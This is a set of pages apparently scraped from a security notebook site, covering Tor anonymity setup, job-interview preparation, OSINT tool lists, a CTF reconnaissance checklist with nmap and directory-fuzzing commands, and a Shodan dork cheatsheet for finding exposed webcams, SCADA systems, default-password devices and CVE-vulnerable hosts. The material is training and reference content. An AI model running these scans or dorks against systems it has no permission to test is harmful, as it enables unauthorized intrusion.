with Bridges is the most robust method for hiding Tor usage from ISPs and censorship. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#critical-hardware-and-environment-warnings) ⚠️ Critical Hardware & Environment Warnings Before downloading or launching Tor, you must address physical hardware configurations that can uniquely identify you. #### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#id-1.-screen-resolution-and-external-monitors) 1\. Screen Resolution & External Monitors * **The Risk:** The Tor Browser standardizes window sizes to prevent fingerprinting. However, connecting an **external monitor via HDMI** changes your system's total resolution and scaling. This creates a unique "dual-screen" fingerprint that can identify you as the only user with that specific setup. * **The Solution:** * **Do not maximize** the Tor Browser window. Keep it at the default size. * **Do not move** the Tor Browser window to the external screen. Keep it on your primary/internal screen. * **Best Practice:** Run the Tor Browser inside a **Virtual Machine (VM)** or boot into **Tails OS**. These environments isolate the browser from your physical hardware configuration, making the external monitor irrelevant to the browser's fingerprint. #### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#id-2.-wireless-peripherals-bluetooth) 2\. Wireless Peripherals (Bluetooth) * **The Risk:** Bluetooth devices broadcast unique **MAC addresses**. While Tor Browser blocks the Web Bluetooth API, a compromised OS or a physical adversary nearby could scan for your specific device constellation (e.g., "Sony Headphones + Apple Watch"). * **The Solution:** * **Turn OFF Bluetooth** on your host computer before starting the session. * **Use Wired Peripherals:** Use wired headphones, mice, and keyboards. They do not broadcast signals or expose MAC addresses. #### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#id-3.-usb-dongles-rf-receivers) 3\. USB Dongles (RF Receivers) * **The Risk:** Wireless headphones that use a **USB dongle** present a specific **Vendor ID** and **Product ID** to the OS. While Tor Browser blocks the Web USB API, the OS-level visibility of this unique hardware ID can contribute to a hardware fingerprint if your system is compromised or if you are using a non-hardened browser. * **The Solution:** * Unplug the Dongle: If you must use these headphones, unplug the dongle and use the wired mode (if available) or switch to wired headphones. * Isolate via VM/Tails: If you must keep the dongle plugged in, run the Tor Browser inside a Virtual Machine or Tails OS. These environments do not expose the host's USB device tree to the browser session, effectively masking the dongle's identity. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#step-1-download-the-official-tor-browser) Step 1: Download the Official Tor Browser **Source:** Only download from [**https://www.torproject.org**](https://www.torproject.org/) . * **Why:** The Tor Browser is a hardened version of Firefox specifically engineered to prevent: * **Fingerprinting:** It standardizes window size, user agent, and canvas rendering. * **JavaScript Exploits:** It blocks or restricts scripts that try to identify your hardware. * **DNS Leaks:** It forces all DNS requests through the Tor network. * **Warning:** Do **NOT** use standard browsers (Chrome, Edge, standard Firefox) with manual proxy settings. They leak WebRTC, DNS, and hardware data that will compromise your anonymity. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#step-2-use-bridges-crucial-for-hiding-from-isp) Step 2: Use "Bridges" (Crucial for Hiding from ISP) If your ISP, workplace, or government blocks Tor, or if you want to hide the fact that you are using Tor entirely, you must use **Bridges**. #### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#how-to-configure-bridges) How to Configure Bridges: 1. Open the **Tor Browser**. 2. On the initial connection screen, click **"Configure Connection"**. 3. Select **"My ISP blocks Tor"** or **"My ISP requires a bridge"**. 4. Choose **Obfs4** bridges. * **How it works:** Obfs4 bridges obfuscate your traffic so it looks like random, meaningless noise to your ISP. They cannot distinguish it from regular encrypted traffic, making it extremely difficult to block or flag. 5. **Where to get them:** * Request new bridges directly inside the Tor Browser settings. * Visit [**https://bridges.torproject.org**](https://bridges.torproject.org/) to get a bridge address and paste it into the settings. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#operational-security-opsec) Operational Security (OpSec) Even with the best tools, user behavior can break anonymity. Follow these rules strictly: #### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#id-1.-never-maximize-the-window) 1\. Never Maximize the Window * **Rule:** Keep the Tor Browser window at its default size. * **Reason:** Maximizing the window reveals your exact screen resolution, which can identify you as a unique user. #### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#id-2.-do-not-log-into-personal-accounts) 2\. Do Not Log Into Personal Accounts * **Rule:** Never log into Google, Facebook, Twitter, your email, or any account linked to your real identity while using Tor. * **Reason:** Logging in instantly links your anonymous Tor session to your real-world identity. #### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#id-3.-disable-scripts-safest-mode) 3\. Disable Scripts (Safest Mode) * **Rule:** Set the security level to **"Safest"** (click the shield icon in the top right corner). * **Reason:** This disables JavaScript, the most common vector for de-anonymization attacks. While some websites may break, this provides the highest level of protection. #### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#id-4.-use-tails-os-maximum-anonymity) 4\. Use Tails OS (Maximum Anonymity) If you need the highest possible security (e.g., you are a journalist, activist, or in a hostile environment): * **Action:** Do not use your main operating system. Instead, download and boot into **Tails OS**. * **Source:** [**https://tails.net**](https://tails.net/) * **What it is:** A live operating system that runs from a USB stick. * It forces **all** connections through Tor automatically. * It leaves **no trace** on the computer you boot into (RAM is wiped on shutdown). * It includes the Tor Browser pre-configured with all security settings enabled. * **Hardware Isolation:** It naturally masks hardware IDs (USB dongles, Bluetooth MACs) from the browser session. * **Why:** Even if your computer is infected with malware, Tails runs in a clean, isolated environment. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#summary-checklist-for-safe-usage) Summary Checklist for Safe Usage Action Status **Download Source** ✅ Only from `torproject.org` **Bridges** ✅ Enabled (Obfs4) if hiding from ISP **Window Size** ✅ **Never Maximized** (Keep default) **External Monitor** ⚠️ **Avoid** or use VM/Tails to isolate **Wireless Headphones** ❌ **Avoid** (Turn off Bluetooth) **USB Dongles** ⚠️ **Avoid** or use VM/Tails to isolate **Personal Accounts** ❌ **Never Logged In** **Security Level** ✅ Set to **"Safest"** **Operating System** ✅ Tails OS recommended for max security By following this guide and strictly adhering to the hardware isolation rules regarding monitors, Bluetooth, and USB dongles, you ensure that your digital footprint remains as small and unidentifiable as possible. Last updated 1 month ago * [⚠️ Critical Hardware & Environment Warnings](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#critical-hardware-and-environment-warnings) * [Step 1: Download the Official Tor Browser](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#step-1-download-the-official-tor-browser) * [Step 2: Use "Bridges" (Crucial for Hiding from ISP)](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#step-2-use-bridges-crucial-for-hiding-from-isp) * [Operational Security (OpSec)](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#operational-security-opsec) * [Summary Checklist for Safe Usage](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor#summary-checklist-for-safe-usage) --- # Resume and Interview Guide | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/training-and-career/guides/interview-checklist.md) . Sometimes, hiring managers perform a very quick scan of resumes, usually less than a minute. Using that time, they will be trying to find answers to these four questions: * What is the specific job I'll be applying for? * What relevant results have I obtained that verify that I am the perfect fit for THIS role? * What skills, qualifications, and strengths do I bring to the table, and do I have evidence supporting them? * Have I obtained certain achievements in previous positions that will enable me to achieve these in the present one? The answers to the four questions should appear in the top third of the resume. The showcase section is supposed to exhibit these four answers, so when a hiring manager glances through your resume, the immediate response would be: "This is exactly who I have been looking for." You can achieve this by: * Adding your target job title and three high-priority skills at the very top. * This is immediately followed by a personal branding statement that no other person can claim because it speaks to your differentiators. * An accomplishment section deep-dives into the three most relevant ones to the present employer and position you've delivered that really matter. * And a core strengths section filled with hard skill keywords, qualifications and strengths that are relevant to the role. * Write resume focused on results and contribtuions bullets that spotlight the specific achievements you’ve delivered in the past. Choose achievements that directly relate to the needs, problems and goals of the position. Employers will judge your future performance based on your past performance. Your past performance is an indicator of future success. Use metrics, data, and figures to cement in the hiring manager’s mind that these results are repeatable and verifiable. The more specific you are, the more believable your results. [](https://martian1337.gitbook.io/notes/training-and-career/guides/interview-checklist#interview-checklist) Interview Checklist ------------------------------------------------------------------------------------------------------------------------------------ * What is the company's mission? * What are the company's core values? * Did any core values align with your own? * What do you know about their industry? * Who are their customers and competitors? * What are the company's main products/services? * How do they generate revenue? * Is there any news or content that stands out? * Recent events? * Big wins? * What has the company been posting on YouTube or social media? * Have they released any interesting research, intel, white papers, or webinars? * Get a feel for the leadership of the company * Who's the hiring manager? Can you see who they report to? * Use LinkedIn to find 2-3 people that hold the job you applied to. * Can you gain any insights about their work experience, skills, and current responsibilities? * Can you find any common ground with them? * Review the job description. In your own words write down the main purpose of this role. * How does this role add value to the company? * Review the job description and note keywords * Think about your experience/understanding * Review the job description and note every technology and your experience/understanding * Review the job description and note the required skills and your experience/understanding * "Tell us about yourself" - prepare a 2 minute statement that describes the following: * Your professional/educational experience and skills * Why you're on the market * How you find this opportunity and why you applied * How you are specifically qualified for this opportunity * Be prepared to discuss what you know about the company. Use the research you did at the beginning of this guide to help craft a brief summary statement. * Be prepared to discuss why you're interested in this opportunity and consider how this role applies to your career goals and interests. * Be prepared to discuss your experience with or knowledge of the listed requirements and be ready to discuss exactly what they laid out in the job description or what you understand about the role in general. * Be prepared to discuss how you stay current on the cyber industry * Be prepared to discuss examples of when you solved a problem. Initiative and analytical skills are crucial in security. Think of examples from past experiences * Be prepared to discuss how you work on a team. You will work with diverse teams and stakeholders in security. To be successful you'll have to provide examples of successfully working in a team-oriented environment. * Be prepared to discuss your weaknesses. Don't label yourself during this question! Make it all about the job responsibilities and skills * "I don't have direct experience with XYZ tool but here's my understanding of it ..." * Take this opportunity to discuss your shortcomings and how you'll overcome those and ramp up fast. * Be prepared to discuss your strengths. Again, don't label yourself! Adjectives don't mean much here. * Provide specific examples of how your experience relates to this role. * What kind of value can you bring based on what you know about the role? * Example: "Based on what you've told me so far, your team really values XYZ skill. I am confident in my ability to ..." * Be prepared to discuss how you handle stress and/or competing priorities. Every job will require that you prioritize and get work done efficiently. Think of examples where you've succeeded in this scenario. * Prepare 5-7 interview questions. You may only have time for 2-3 but make sure to bring thoughtful questions about the company, culture, team, and role. [PreviousAppSec Training Pathway](https://martian1337.gitbook.io/notes/training-and-career/guides/appsec-training-pathway) [NextExploit & Malware Development](https://martian1337.gitbook.io/notes/training-and-career/guides/exploit-and-malware-development) Last updated 9 months ago --- # Recon + OSINT | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/resources/recon-+-osint.md) . [](https://martian1337.gitbook.io/notes/resources/recon-+-osint#training) Training --------------------------------------------------------------------------------------- **TryHackMe** Level 1: [https://tryhackme.com/jr/osintintel](https://tryhackme.com/jr/osintintel) Level 2: [https://tryhackme.com/jr/osintledit2](https://tryhackme.com/jr/osintledit2) Level 3: [https://tryhackme.com/jr/osintNEW3-tested](https://tryhackme.com/jr/osintNEW3-tested) [](https://martian1337.gitbook.io/notes/resources/recon-+-osint#top-resources) Top Resources ------------------------------------------------------------------------------------------------- [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fstart.me%2Fimages%2Ffavicons%2Ffavicon-192.png&width=20&dpr=3&quality=100&sign=6155fb6b&sv=2)CyberSpace - Start.meStart.me](https://start.me/p/ADPELy/cyberspace) Martian's Start.me [![Logo](https://bellingcat.gitbook.io/toolkit/~gitbook/image?url=https%3A%2F%2F1607018381-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FFuL0vtRVpXHiKZgFkMFR%252Ficon%252FLNlUz1UbelbconfVnjPS%252Ffavicon.png%3Falt%3Dmedia%26token%3Dd54e03eb-839b-426c-826c-e799b1017d83&width=48&height=48&sign=afddecbc&sv=2)Home | Bellingcat's Online Investigation Toolkitbellingcat.gitbook.io](https://bellingcat.gitbook.io/toolkit) Bellingcat's Online Inestigation Toolkit [](https://martian1337.gitbook.io/notes/resources/recon-+-osint#tool-lists) Tool Lists ------------------------------------------------------------------------------------------- [BuiltWith](https://builtwith.com/) ! [Binary Edge (Threat Intelligence scanner)](https://www.binaryedge.io/) [Censys (Internet Attack Surface monitoring)](https://censys.io/) [CentralOps](https://centralops.net/) [crt.sh (Database of certificate identities](https://crt.sh/) [DNSlytics](https://dnslytics.com/) [EXIF Data](https://exifdata.com/) [FullHunt (Attack Surface Intelligence)](https://fullhunt.io/) [GPS Coordinates](https://gps-coordinates.net/) [GrayHatWarefare (Search public S3 buckets)](https://grayhatwarfare.com/) [Grep App (Searching for data within git repos)](https://grep.app/) [GreyNoise (Search for internet-connected devices)](https://www.greynoise.io/) [Hunter (Find professional email addresses linked to a business)](https://hunter.io/) [IntelligenceX (Search Engine and data archive)](https://intelx.io/) [LeakIX (publicly indexed information)](https://leakix.net/) [Netlas (internet connected asset intel)](https://netlas.io/) [ONYPHE (Cyber Defense Search Engine)](https://www.onyphe.io/) [OpenCorporates](https://opencorporates.com/) [Packet Storm Security (Latest atest security issues and exploit database)](https://packetstormsecurity.com/) [PentestTools](https://pentest-tools.com/) [PimEyes ( Face Recognition Search Engine and Reverse Image Search)](https://pimeyes.com/) [PublicWWW (Marketing and affiliate marketing research](https://publicwww.com/) [Pulsedive—Threat intelligence search engine)](https://pulsedive.com/) [Shodan](https://shodan.io/) ! [SpiderFoot](https://www.spiderfoot.net/) [SpyOnWeb](https://spyonweb.com/) [URL Scan (Analyse websites)](https://urlscan.io/) [ViewDNS](https://viewdns.info/) [VirusTotal](https://virustotal.com/) [Wayback Machine](https://web.archive.org/) [Vulners (Search engine for Security Intel)](https://vulners.com/) [Wigle (Database of wireless networks)](https://www.wigle.net/) [ZoomEye (Information Gathering for IP connected devces)](https://www.zoomeye.org/) [How to create sockpuppet accounts](https://garrettmickley.com/sockpuppet-account-creation/) ! [Ultimate OSINT Handbook on Personal Information by SOCRadar](https://socradar.io/the-ultimate-osint-handbook-on-personal-information/) [Commandergirl's suggestions - powerful OSINT Dashboard](https://start.me/p/1kJKR9/commandergirl-s-suggestions) [Hatles1der's Ultimate OSINT Collection Dashboard](https://start.me/p/DPYPMz/the-ultimate-osint-collection) [Ohshint Blog](https://ohshint.gitbook.io/) [Censys Search Minmap](https://github.com/censys-workshop/censys-search-mindmap) [OSINT Framework](https://osintframework.com/) [DorkSearch](https://dorksearch.com/) ! [SearchCode](https://searchcode.com/) [Shodan Search Engine](https://www.shodan.io/) ! [OSINT Tool Collection Repo](https://github.com/cipher387/osint_stuff_tool_collection/) [Awesome Shodan Queries](https://github.com/jakejarvis/awesome-shodan-queries) ! [OWASP Maryam](https://github.com/saeeddhqan/Maryam) [Karma from @Dheerajmadhukar](https://github.com/Dheerajmadhukar/karma_v2) [sn0int](https://github.com/kpcyrd/sn0int) ! [Scrummage OSINT and Threat Hunting Framework](https://github.com/matamorphosis/Scrummage) [OSINT Framework Reference](https://osintframework.com/) [BlackBird](https://github.com/p1ngul1n0/blackbird) [uncover](https://github.com/projectdiscovery/uncover) [Oh365 User Finder](https://github.com/dievus/Oh365UserFinder) [WeakestLink LinkedIN Tool](https://github.com/shellfarmer/WeakestLink) [msDorkDump](https://github.com/dievus/msdorkdump) [geeMailUserFinder](https://github.com/dievus/geeMailUserFinder) [Exchange Finder](https://github.com/mhaskar/ExchangeFinder) [Octosuite - Github user OSINT](https://github.com/bellingcat/octosuite/wiki/INSTALLATION) [LinkScope](https://github.com/AccentuSoft/LinkScope_Client) - perform online investigations [sub3suite](https://github.com/3nock/sub3suite) [Phoneinfoga](https://github.com/sundowndev/phoneinfoga) [bbot](https://github.com/blacklanternsecurity/bbot) [h8mail](https://github.com/khast3x/h8mail) [Alfred](https://github.com/alfredredbird/alfred) - Social Media OSINT [InfoHunter](https://hunt.martiandefense.org/) ! [PreviousApplication Security](https://martian1337.gitbook.io/notes/resources/appsec) [NextInternal Active Recon](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon) Last updated 10 months ago * [Training](https://martian1337.gitbook.io/notes/resources/recon-+-osint#training) * [Top Resources](https://martian1337.gitbook.io/notes/resources/recon-+-osint#top-resources) * [Tool Lists](https://martian1337.gitbook.io/notes/resources/recon-+-osint#tool-lists) --- # Checklists | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/appsec/checklists.md) . [WEB APP PENTESTING CHECKLIST](https://martian1337.gitbook.io/notes/notes/appsec/checklists/web-app-pentesting-checklist) [API Testing Checklist](https://martian1337.gitbook.io/notes/notes/appsec/checklists/api-testing-checklist) [Android Pentesting Checklist](https://martian1337.gitbook.io/notes/notes/appsec/checklists/android-pentesting-checklist) [IoS Pentesting Checklist](https://martian1337.gitbook.io/notes/notes/appsec/checklists/ios-pentesting-checklist) [Thick Client Pentesting Checklist](https://martian1337.gitbook.io/notes/notes/appsec/checklists/thick-client-pentesting-checklist) [Secure Code Review Checklist](https://martian1337.gitbook.io/notes/notes/appsec/checklists/secure-code-review-checklist) [PreviousAppSec Testing](https://martian1337.gitbook.io/notes/notes/appsec) [NextWEB APP PENTESTING CHECKLIST](https://martian1337.gitbook.io/notes/notes/appsec/checklists/web-app-pentesting-checklist) Last updated 1 year ago --- # LLM Pentesting | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/llm-pentesting.md) . Resources/Tooling [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=a90b8e92&sv=2)GitHub - NVIDIA/garak: the LLM vulnerability scannerGitHub](https://github.com/NVIDIA/garak) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=a90b8e92&sv=2)promptfooGitHub](https://github.com/promptfoo) [PreviousBlockchain](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/blockchain) [NextDefensive](https://martian1337.gitbook.io/notes/resources/defensive-cybersecurity) Last updated 3 months ago --- # Vulnerable Machine Checklist | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/vulnerable-machine-checklist.md) . ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/vulnerable-machine-checklist#initial-reconnaissance) Initial Reconnaissance * Perform a full port scan using Nmap: * `nmap $IP -p- -sC -sV` * Perform a no-ping scan (useful if ICMP is blocked): * `nmap $IP -p- -sC -sV -Pn` ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/vulnerable-machine-checklist#enumeration) Enumeration * Enumerate services and versions on open ports. * Check for default credentials on common services (FTP, SSH, SMB, etc.). * Perform directory and file enumeration on web servers (if any): * Use tools like: * Dirbuster * Dirb `dirb http://$IP /path/to/wordlist` * wfuzz - `wfuzz -c -z file,/pasth/to/wordlist -u http://$IP/FUZZ` * `curl https://example.com/wordlist.txt | wfuzz -c -w - http://target/FUZZ` - here `-w -` instructs Wfuzz to read from standard input instead of a local file * Gobuster - `gobuster dir -u http://$IP -w /path/to/wordlist` * ffuf - `ffuf -w /path/to/wordlist -u http://$IP/FUZZ` ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/vulnerable-machine-checklist#vulnerability-scanning) Vulnerability Scanning * Use vulnerability scanners like Nikto, OpenVAS, or Nessus to identify potential vulnerabilities * Manually check for known exploits of identified services ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/vulnerable-machine-checklist#exploitation) Exploitation * Attempt to exploit known vulnerabilities: * Use Metasploit Framework or manual exploitation methods * Look for misconfigurations or weak points (like weak passwords) ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/vulnerable-machine-checklist#post-exploitation) Post-Exploitation * Check for privilege escalation opportunities * Linux * [https://gtfobins.github.io/](https://gtfobins.github.io/) * [https://github.com/Frissi0n/GTFONow](https://github.com/Frissi0n/GTFONow) * [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) * Windows * [WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS) * Document any loot (passwords, keys, confidential data) * CrackMapExec * Impacket * When successful, enumerate the system for the flag [PreviousCapture-the-Flag Training](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training) [NextReverse Engineering Checklist](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist) Last updated 6 months ago * [Initial Reconnaissance](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/vulnerable-machine-checklist#initial-reconnaissance) * [Enumeration](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/vulnerable-machine-checklist#enumeration) * [Vulnerability Scanning](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/vulnerable-machine-checklist#vulnerability-scanning) * [Exploitation](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/vulnerable-machine-checklist#exploitation) * [Post-Exploitation](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/vulnerable-machine-checklist#post-exploitation) --- # Shodan Dork Cheatsheet | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet.md) . ### [](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#general-search-queries) General Search Queries * `city:”[city name]”`: Devices in a specific city. * `country:”[country code]”`: Devices in a specified country. * `geo:”[latitude],[longitude]”`: Geographic location-specific devices. * `hostname:”[hostname]”`: Devices with a particular hostname. * `net:”[IP range]”`: Devices within a certain IP range. * `os:”[operating system]”`: Devices running a specific OS. * `port:”[port number]”`: Devices open on a specific port. * `org:”[organization name]”`: Devices related to a certain organization. * `isp:”[ISP name]”`: Devices using a specific ISP. * `product:”[product name]”`: Devices with a specific software/hardware. * `version:”[version number]”`: Devices on a particular software version. * `has_screenshot:”true”`: Devices with available screenshots. * `ssl.cert.subject.cn:”[common name]”`: SSL certificates with a specific CN. * `http.title:”[title text]”`: Web pages with a certain title. * `http.html:”[HTML content]”`: Web pages containing specific HTML. * `http.status_code:[code]`: Devices returning a specific HTTP status code. * `ssl:”[SSL keyword]”`: Devices with specific SSL configurations/details. * `before:”[date]” / after:”[date]”`: Devices online before/after a date. * `bitcoin.ip:”[IP address]”`: Bitcoin nodes by IP. * `ssh.fingerprint:”[fingerprint]”`: SSH servers with a specific fingerprint. ### [](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#applications-and-services) Applications and Services * `product:”[product name]”`: Devices running a specific product. * `version:”[version]”`: Devices with a specific version number. * `webcam`: Searches for internet-connected webcams. * `“default password”`: Devices using default passwords. * `“server: Apache”`: Finds Apache web servers. * `ftp`: Devices with FTP services. * `“X-Powered-By: PHP/[version]”`: PHP version-specific servers. * `iis:[version number]`: Servers running Microsoft IIS. * `“Server: nginx”`: Devices running Nginx server. * `“MongoDB Server Information” port:27017`: MongoDB databases on default port. * `“CCTV”`: Internet-connected CCTV cameras. * `“PBX VoIP”`: VoIP PBX systems. * `“Elasticsearch”`: Elasticsearch servers. * `“OpenSSL”`: Devices using OpenSSL. * `“SCADA”`: SCADA systems. * `“VoIP Phone”`: Internet-connected VoIP phones. ### [](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#device-and-service-identification) Device and Service Identification * `asn:”[ASN]”`: Devices associated with a specific ASN. * `http.favicon.hash:[hash]`: Web servers with a specific favicon hash. * `ntp.ip:”[IP address]”`: NTP servers related to a specific IP. * `ssl.cert.issuer.cn:”[issuer CN]”`: SSL certificates issued by a specific issuer. * `http.component:”[component]”`: Web applications using specific components. * `http.robotstxt:”[content]”`: Web servers with specific robots.txt content. * `http.waf:”[WAF name]”`: Identification of web application firewalls. * `http.xssed:”[keyword]”`: Web pages marked in XSSed database. * `http.cookie:”[cookie name]”`: Web servers setting a specific cookie. * `http.useragent:”[user agent]”`: Devices with a specific user agent. ### [](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#network-and-infrastructure-analysis) Network and Infrastructure Analysis * `not ssl`: Devices not using SSL. * `metadata:”[keyword]”`: Searches for devices with specific metadata. * `http.html_hash:[hash]`: Identifies web pages with a specific HTML hash. * `netblock:”[owner]”`: Devices within a netblock owned by a specific entity. * `asn:”[ASN]”`: Devices associated with a specific ASN. * `http.server_header:”[header content]”`: Devices with specific server header responses. * `udp`: Devices with open UDP ports. * `telnet`: Devices accessible via Telnet. ### [](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#iot-and-connected-devices) IoT and Connected Devices * `“smart tv”`: Searches for internet-connected smart TVs. * `“printer” “default password”`: Printers possibly using default passwords. * `“Raspberry Pi” port:22`: Raspberry Pi devices with SSH enabled. * `“thermostat” “wifi”`: Wi-Fi-enabled thermostats. * `“smart home”`: Various smart home devices. * `“IP camera” “default login”`: IP cameras with default login credentials. * `“smart meter”`: Internet-connected smart meters. * `“home automation”`: Home automation systems. * `“wearable”`: Wearable technology devices. ### [](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#security-and-vulnerability-research) Security and Vulnerability Research * `ssl.cert.serial:”[serial number]”`: SSL certificates by serial number. * `“Server: Microsoft-HTTPAPI/2.0”`: Devices running specific Microsoft HTTP services. * `“Cisco IOS” “http auth”`: Cisco IOS devices with HTTP authentication. * `“default login” “router”`: Routers with default login credentials. * `“Hadoop NameNode”`: Hadoop NameNode servers. * `“Apache Struts” vuln`: Apache Struts vulnerabilities. * `“Tomcat” admin`: Tomcat servers with admin panels. * `“Docker” port:2375`: Docker instances on default port. * `vuln:”[CVE-ID]”`: Searches for vulnerabilities with a specific CVE ID. * `“200 OK” ssl`: Servers with SSL certificates returning 200 OK. * `“Server: Apache” -“mod_ssl” -“OpenSSL”`: Apache servers potentially without SSL encryption. * `ssl.cert.expired:”true”`: Devices with expired SSL certificates. * `“heartbleed” vuln`: Searches for vulnerabilities related to Heartbleed. * `http.component:”Drupal” vuln:”CVE-2018-7600″`: Drupal sites vulnerable to a specific CVE. * `“Authentication: disabled”`: Devices with authentication disabled. * `http.title:”Index of /”`: Directories with potentially open indexes. * `ssl:”TLSv1″`: Searches for devices using the older TLSv1 protocol. * `org:”[organization]” vuln:”[CVE-ID]”`: Searches for vulnerabilities within a specific organization. * `“EternalBlue” vuln`: Devices vulnerable to EternalBlue. * `“Joomla” vuln`: Joomla sites with specific vulnerabilities. * `“WordPress” vuln`: WordPress sites with specific vulnerabilities. * `“SQL Injection” vuln`: Devices vulnerable to SQL Injection. * `“DDoS” vuln`: Devices potentially vulnerable to DDoS attacks. ### [](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#geographic-and-demographic-analysis) Geographic and Demographic Analysis * `city:”[city]” os:”[OS]”`: Devices with a specific OS in a city. * `country:”[country]” product:”[product]”`: Specific devices in a country. * `region:”[region]”`: Devices in a specific region. * `postal:”[postal code]”`: Devices in a specific postal code. * `latitude:”[latitude]” longitude:”[longitude]”`: Devices at specific coordinates. * `area:”[area code]”`: Devices in a specific area code. ### [](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#combined-queries) Combined Queries * `os:”Linux” port:”22″ “SSH” country:”JP”`: Linux devices with SSH in Japan. * `product:”Apache” version:”2.4.7″ -“200 OK”`: Apache servers not returning 200 OK. * `city:”New York” os:”Windows” port:”3389″`: Windows devices with RDP in New York. * `net:”192.168.1.0/24″ webcam`: Webcams in the 192.168.1.0/24 IP range. * `org:”Google” ssl cert:”expired”`: Expired SSL certificates in Google's infrastructure. * `country:”DE” product:”MySQL” version:”5.5″ “default password”`: MySQL databases in Germany. * `“HTTP/1.1 401 Unauthorized” city:”London” port:”80″`: Unauthorized HTTP responses in London. * `“Server: Apache” -“Apache-Coyote” country:”BR”`: Apache servers in Brazil. * `hostname:”*.edu” vuln:”CVE-2019-11510″`: Educational institutions vulnerable to CVE-2019-11510. * `“IIS/8.0” -“X-Powered-By” net:”205.251.192.0/18″`: IIS 8.0 servers in the specified range. [PreviousPublishing CVEs](https://martian1337.gitbook.io/notes/notes/security-research/publishing-cves) [NextGithub Dorks](https://martian1337.gitbook.io/notes/notes/security-research/github-dorks) Last updated 1 year ago * [General Search Queries](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#general-search-queries) * [Applications and Services](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#applications-and-services) * [Device and Service Identification](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#device-and-service-identification) * [Network and Infrastructure Analysis](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#network-and-infrastructure-analysis) * [IoT and Connected Devices](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#iot-and-connected-devices) * [Security and Vulnerability Research](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#security-and-vulnerability-research) * [Geographic and Demographic 